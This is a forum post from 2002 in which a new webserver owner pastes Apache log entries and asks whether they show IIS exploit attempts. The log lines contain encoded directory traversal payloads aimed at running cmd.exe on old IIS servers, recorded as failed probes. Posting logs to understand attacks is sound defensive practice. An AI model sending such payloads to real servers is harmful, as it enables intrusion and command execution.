I just started running a webserver which so far is pretty empty and its only been up for 9 days but I keep getting this in my apache logs.
Code:
24.165.7.125 - - [16/Jan/2002:22:12:13 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296 "-" "-"
24.165.7.125 - - [16/Jan/2002:22:12:13 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296 "-" "-"
24.165.7.125 - - [16/Jan/2002:22:12:13 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296 "-" "-"
24.165.7.125 - - [16/Jan/2002:22:12:14 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296 "-" "-"
24.165.7.125 - - [16/Jan/2002:22:12:14 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 280 "-" "-"
24.165.7.125 - - [16/Jan/2002:22:12:14 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 280 "-" "-"
24.165.7.125 - - [16/Jan/2002:22:12:14 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
24.165.7.125 - - [16/Jan/2002:22:12:15 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
I never stayed up to date with all those IIS exploits but is that whats happening here? I've seen this script many times in my logs. Theres about 3 log files of 1/2 meg after only 9 days with me only lightly using it. Is this a lot?
Bookmarks